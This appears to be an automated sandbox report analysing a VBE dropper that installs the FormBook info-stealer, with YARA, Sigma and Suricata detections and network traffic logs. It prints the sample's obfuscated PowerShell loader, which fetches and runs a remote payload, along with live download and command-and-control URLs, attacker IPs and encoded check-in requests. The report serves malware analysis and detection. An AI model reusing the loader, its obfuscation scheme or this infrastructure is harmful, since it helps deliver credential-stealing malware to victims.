      0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 17 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_1068.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_5812.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xd0d1:$b2: ::FromBase64String(
          • 0xc141:$s1: -join
          • 0x58ed:$s4: +=
          • 0x59af:$s4: +=
          • 0x9bd6:$s4: +=
          • 0xbcf3:$s4: +=
          • 0xbfdd:$s4: +=
          • 0xc123:$s4: +=
          • 0x16e6c:$s4: +=
          • 0x16eec:$s4: +=
          • 0x16fb2:$s4: +=
          • 0x17032:$s4: +=
          • 0x17208:$s4: +=
          • 0x1728c:$s4: +=
          • 0xc96b:$e4: Get-WmiObject
          • 0xcb5a:$e4: Get-Process
          • 0xcbb2:$e4: Start-Process
          • 0x17b69:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", ProcessId: 6572, ProcessName: wscript.exe
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.159.140.237, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1852, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", ProcessId: 6572, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMer

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T14:51:15.879361+020020507451Malware Command and Control Activity Detected192.168.2.44994684.32.84.3280TCP
          2024-10-05T14:51:39.172827+020020507451Malware Command and Control Activity Detected192.168.2.45000884.32.84.3280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T14:50:25.120627+020028032702Potentially Bad Traffic192.168.2.449737162.159.140.237443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Narudzba ACH0036173.vbeReversingLabs: Detection: 26%
          Source: Narudzba ACH0036173.vbeVirustotal: Detection: 11%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: Binary string: msinfo32.pdb source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bqm.Core.pdb4 source: powershell.exe, 00000006.00000002.2057275222.0000000008137000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe
          Source: Binary string: msinfo32.pdbGCTL source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECC110 FindFirstFileW,FindNextFileW,FindClose,13_2_02ECC110

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 4x nop then xor eax, eax13_2_02EB99F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 4x nop then mov ebx, 00000004h13_2_04D204DE

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49946 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50008 -> 84.32.84.32:80
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
          Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
          Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
          Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
          Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
          Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 162.159.140.237:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /nedkoge.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.devConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /BEkfITzYaj231.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.devCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /7z6q/?-Ly=tZ6DMnK&ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.casesrep.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
          Source: global trafficHTTP traffic detected: GET /7z6q/?ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ=&-Ly=tZ6DMnK HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.casesrep.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
          Source: global trafficDNS traffic detected: DNS query: 6777.6777.6777.677e
          Source: global trafficDNS traffic detected: DNS query: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
          Source: global trafficDNS traffic detected: DNS query: www.casesrep.site
          Source: global trafficDNS traffic detected: DNS query: www.kuaimaolife.shop
          Source: unknownHTTP traffic detected: POST /7z6q/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.casesrep.siteOrigin: http://www.casesrep.siteConnection: closeCache-Control: max-age=0Content-Length: 202Content-Type: application/x-www-form-urlencodedReferer: http://www.casesrep.site/7z6q/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 68 45 68 39 66 73 6c 76 30 71 34 4f 65 7a 38 78 4a 45 51 7a 51 52 73 66 51 44 6b 52 74 37 68 77 59 66 33 41 66 50 44 59 74 7a 77 62 6c 33 56 47 52 46 46 30 6f 73 43 6e 58 5a 46 67 4a 6d 6a 2b 41 57 48 69 70 58 63 45 46 4e 7a 42 65 59 7a 6d 45 57 76 79 55 73 52 7a 43 44 43 48 50 45 48 67 77 4c 4f 32 4d 57 4b 61 72 52 4c 2b 59 6f 55 39 67 70 6e 36 32 35 66 38 6b 54 33 4d 67 55 6e 7a 79 32 47 71 42 71 72 59 35 33 56 79 39 66 42 45 4e 4a 77 58 35 4c 57 6f 52 4e 6e 6e 51 47 73 70 64 72 4a 64 6c 55 48 32 6c 50 71 2f 32 4c 4a 57 4d 39 56 54 69 51 3d 3d Data Ascii: ZppxP=eJf9oHVNYSPFhEh9fslv0q4Oez8xJEQzQRsfQDkRt7hwYf3AfPDYtzwbl3VGRFF0osCnXZFgJmj+AWHipXcEFNzBeYzmEWvyUsRzCDCHPEHgwLO2MWKarRL+YoU9gpn625f8kT3MgUnzy2GqBqrY53Vy9fBENJwX5LWoRNnnQGspdrJdlUH2lPq/2LJWM9VTiQ==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 05 Oct 2024 12:51:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 05 Oct 2024 12:51:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE5009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE4CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
          Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/
          Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin
          Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin$Y
          Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binE
          Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bing
          Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/M
          Source: powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoP
          Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoXR
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49737 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi32_5812.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
